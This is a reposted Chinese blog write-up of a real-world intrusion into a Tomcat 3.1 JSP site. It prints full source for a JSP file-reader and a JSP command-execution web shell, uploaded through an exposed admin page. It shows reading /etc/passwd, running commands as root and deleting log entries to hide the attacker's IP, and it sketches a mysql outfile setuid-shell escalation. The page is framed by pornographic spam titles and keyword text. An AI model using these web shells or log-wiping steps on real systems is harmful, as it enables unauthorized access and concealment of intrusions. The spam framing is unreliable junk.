青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

隨筆 - 298  文章 - 377  trackbacks - 0
<2016年6月>
2930311234
567891011
12131415161718
19202122232425
262728293012
3456789

常用鏈接

留言簿(34)

隨筆分類

隨筆檔案

文章檔案

相冊

收藏夾

搜索

  •  

最新評論

閱讀排行榜

評論排行榜

本文描述了如何通過WEB入侵獲得freebsd 4.0的root權限。
文章主要以教育為目的,希望各位觀者不要使用本文中的一些方法及程序,危害網絡的安全。
作者:lovehacker
聯系方式:lovehacker@263.net
網站地址: http://www.chinansl.com
版權屬安盟信息科技有限責任公司所有,允許轉載,但需保持文章的完整性。


很偶然的一個機會,看到了一個網站,頁面清新,很舒服的感覺。網站是用JSP開發的,由于個人愛好,所以我決定看看系統的安全性。

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]
返回的結果如下:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

<h1>Error: 404</h1>
<h2>Location: /CHINANSL</h2>File Not Found<br>/CHINANSL
我獲得了運行的WEBServer的名稱"Tomcat 3.1"。我記得我曾經發現過這個版本的漏洞,并且post到bugtrap上去過。
大概是:通過".."技術可以退出WEB目錄,于是:
http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.JSP %81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.JSP %2581 (不行)
http://target:8080/WEB-INF/ (不行)
嗯,在試試吧!Tomcat 3.1自帶了一個管理工具,可以查看WEB下的目錄及文件,并且可以添加context.試一下: http://target:8080/admin/
管理員果然沒有刪除或禁止訪問這個目錄:-(失誤!!!!!
接著我點"VIEW ALL CONTEXT"按鈕,列出了WEB目錄下的一些文件和目錄的名稱,我開始仔細的看了起來,一小會兒,發現了一個上傳文件的組件,嘿嘿,寫一個jsp文件弄上去看看。
幾口咖啡的時間,我寫了這么一個東東出來:
<%@ page import="java.io.*" %>
<%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"<br>");
}
}catch(IOException e){}
%>
通過上傳的組件將這個jsp上傳到對方的WEB目錄里,然后:
http://target:8080/upload/test.jsp?file=/etc/passwd
嘿嘿,密碼出來啦。我只看了"/etc/passwd",并沒有看"/etc/shadow",因為當時考慮webserver一般使用nobody的身份啟動的,看了也白看。(失誤)
接下來的過程是無聊的猜測密碼,沒有成功。算了,那我只有將就點,反正現在我相當于有了一個shell了嘛,猜不出密碼上去,那就全當IE是我的SHELL環境吧!
再寫:
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
然后把這個jsp又通過upload上傳了上去,嘿嘿,我現在有個SHELL了。
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(我這里就不列出來了)
怎么獲得root呢?經過一番搜索我發現了系統安裝了mysql并且我從jsp的源代碼中得到了mysql的密碼:)看看是什么權限運行的mysql:
http://target:8080/upload/cmd.jsp?cmd=ps+aux +|grep+mysqld
顯示:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
嘿嘿,有辦法了,系統是以root身份運行的mysql,同時我知道了mysql的密碼,那我現在我可以寫一個shell程序,讓它create一個表,然后將我的數據放到表中,然后再使用"select ... into outfile;"的辦法在系統上創建一個文件,讓用戶在執行su的時候,運行我的程序。(還記得apache.org有一次被入侵嗎?hacker就采用的這種辦法)。
然后,我再上傳bindshell之類的程序,運行、獲得nobody的權限,然后......再使用su root時幫忙創建的setuid shell讓自己成為root.
嘿嘿,真是好辦法,我都為我的想法感到得意......

接下去的事情,差點沒讓我吐血:
我敲了一個: http://target:8080/upload/cmd.jsp?cmd=id
顯示:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
kao,我的這個WEB SHELL本來就是ROOT,真是服了那個管理員,也服了自己。竟然折騰了這么半天,哎!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份運行的(不列出來了)

剩下來的事情:
1、刪除我的telnet記錄。
2、刪除http的日志。
至于清除日志嘛,我使用的辦法是:cat xxx |grep -V "IP" >>temp然后在把temp覆蓋那些被我修改過的日志文件。
我沒有更換他的頁面,因為我本身也就不是什么黑客啦,更不是紅客,只是個網絡安全愛好者而已。所以,發封郵件告訴system admin吧!
當然,我順便在信中提到,如果需要安盟信息科技為他提供安全服務的話,我們會非常的高興!

posted on 2007-06-19 00:51 聶文龍 閱讀(572) 評論(0)  編輯 收藏 引用 所屬分類: some hack imformation
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            国产精品热久久久久夜色精品三区| 好看不卡的中文字幕| 国产精品国产三级国产普通话三级 | 在线欧美亚洲| 久久精品夜色噜噜亚洲a∨| 一区二区三欧美| 欧美日韩国产一区二区| 亚洲精品在线视频| 亚洲精品三级| 欧美日韩人人澡狠狠躁视频| 中日韩美女免费视频网址在线观看| 亚洲黄色成人| 欧美xart系列在线观看| 亚洲黑丝在线| 91久久精品国产91性色| 欧美精品乱码久久久久久按摩| 亚洲理论在线| 欧美激情精品久久久久久久变态| 国产日韩精品在线观看| 亚洲一区二区三区四区五区午夜| 日韩一级成人av| 国产精品劲爆视频| 欧美一级播放| 久久国产精品免费一区| 在线成人欧美| 91久久精品日日躁夜夜躁欧美| 欧美激情一区二区三区在线视频观看 | 欧美高清日韩| 欧美日韩高清不卡| 午夜精品久久久久久久99黑人| 欧美一区二视频| 亚洲国产婷婷香蕉久久久久久99 | 久久欧美中文字幕| 亚洲精品久久久久| 日韩亚洲在线| 国产欧美日韩亚洲| 欧美激情一区二区三区在线视频观看 | 久久人人97超碰精品888| 亚洲韩国青草视频| 亚洲午夜伦理| 亚洲国产欧美一区二区三区丁香婷| 亚洲精品久久久久久久久久久久久 | 亚洲一二三区精品| 在线看成人片| 亚洲天堂av电影| 亚洲大胆在线| 亚洲一区二区三区四区在线观看 | 久久先锋影音av| 欧美日韩国产123| 久久免费偷拍视频| 欧美日韩喷水| 欧美福利视频| 国产日韩欧美高清| 日韩午夜av| 影音先锋一区| 亚洲一区制服诱惑| 99视频超级精品| 久久免费视频一区| 欧美永久精品| 欧美三级在线视频| 欧美激情一区二区三区四区| 国产女精品视频网站免费| 亚洲黄色免费电影| 精品福利电影| 香蕉成人久久| 亚洲午夜激情| 欧美激情第三页| 久久久亚洲欧洲日产国码αv| av成人免费在线| 久久综合九色综合欧美狠狠| 亚洲免费在线观看| 欧美日韩国产美| 亚洲高清视频的网址| 韩国亚洲精品| 羞羞答答国产精品www一本| 亚洲在线观看视频网站| 欧美精品在线一区二区三区| 欧美国产欧美亚洲国产日韩mv天天看完整| 国产日韩欧美视频| 亚洲自拍都市欧美小说| 亚洲视频在线看| 欧美女同在线视频| 亚洲黄网站黄| 99精品99| 欧美日韩亚洲不卡| 99精品久久久| 亚洲一区二区三区涩| 欧美三级午夜理伦三级中视频| 亚洲国产裸拍裸体视频在线观看乱了| 加勒比av一区二区| 久久久久久久久久久久久女国产乱| 久久久久久高潮国产精品视| 国产午夜一区二区三区| 欧美在线国产| 免费观看30秒视频久久| 亚洲第一黄网| 欧美福利视频一区| 亚洲精品永久免费精品| 中文亚洲欧美| 国产伦精品一区| 久久精品国产999大香线蕉| 乱码第一页成人| 亚洲精品国精品久久99热| 欧美久久电影| 亚洲中字黄色| 猛干欧美女孩| 亚洲美女精品久久| 国产精品久久久久久久久久久久久久| 亚洲视频香蕉人妖| 久久久午夜电影| 亚洲激情啪啪| 国产精品v亚洲精品v日韩精品 | 日韩视频一区二区在线观看| 欧美激情一区二区三级高清视频| 亚洲精品免费电影| 翔田千里一区二区| 一区二区视频免费在线观看 | 国内自拍视频一区二区三区| 久久综合伊人77777尤物| 亚洲精品无人区| 亚洲欧美日韩综合aⅴ视频| 国产综合在线看| 欧美精品一区二区三区久久久竹菊 | 欧美一级淫片播放口| 欧美激情亚洲国产| 亚洲欧美在线高清| 亚洲第一网站免费视频| 在线成人av| 午夜一级久久| 91久久精品一区| 欧美在线视频不卡| 亚洲三级电影在线观看| 国产精品欧美一区二区三区奶水| 久久青青草原一区二区| 中文在线不卡| 亚洲国产欧美久久| 久久人人爽爽爽人久久久| 亚洲手机成人高清视频| 亚洲第一主播视频| 国产精品入口| 欧美精品一区二区精品网| 久久成人18免费网站| 宅男噜噜噜66国产日韩在线观看| 美女露胸一区二区三区| 亚洲欧美日韩国产综合在线| 亚洲高清免费| 一区一区视频| 国产一区二区三区四区| 国产精品久久久久一区二区三区共 | 亚洲精品视频在线观看免费| 国产人成精品一区二区三| 欧美日韩国产色视频| 久久亚洲色图| 久久久久久久久久久久久久一区| 亚洲女同在线| 亚洲视频综合| av成人手机在线| 亚洲区国产区| 亚洲国产日韩欧美在线图片| 狂野欧美激情性xxxx欧美| 欧美呦呦网站| 欧美一区二区视频在线| 欧美xxx成人| 玖玖玖国产精品| 欧美自拍偷拍| 久久成人资源| 久久久国产精品亚洲一区| 亚洲欧美日韩爽爽影院| 亚洲一区中文| 欧美在线一级视频| 欧美一区二区三区视频免费播放| 一区二区三区视频在线| 亚洲日韩成人| 日韩视频在线观看一区二区| 亚洲免费观看高清完整版在线观看| 欧美国产一区二区在线观看 | 久久精品视频99| 久久精品日韩欧美| 久久深夜福利| 欧美xxx成人| 欧美精品v国产精品v日韩精品| 老司机午夜精品视频在线观看| 亚洲国产一区二区三区在线播| 欧美成人精品福利| 亚洲国产成人精品久久| 亚洲高清资源| 亚洲激情六月丁香| 亚洲巨乳在线| 亚洲中字黄色| 久久久噜噜噜久噜久久| 欧美成人三级在线| 欧美三区在线视频| 国产欧美一区二区精品秋霞影院| 国产尤物精品| 91久久久亚洲精品| 亚洲欧美日本视频在线观看| 久久久久久9999| 亚洲天堂黄色| 亚洲精品日日夜夜| 亚洲性感激情|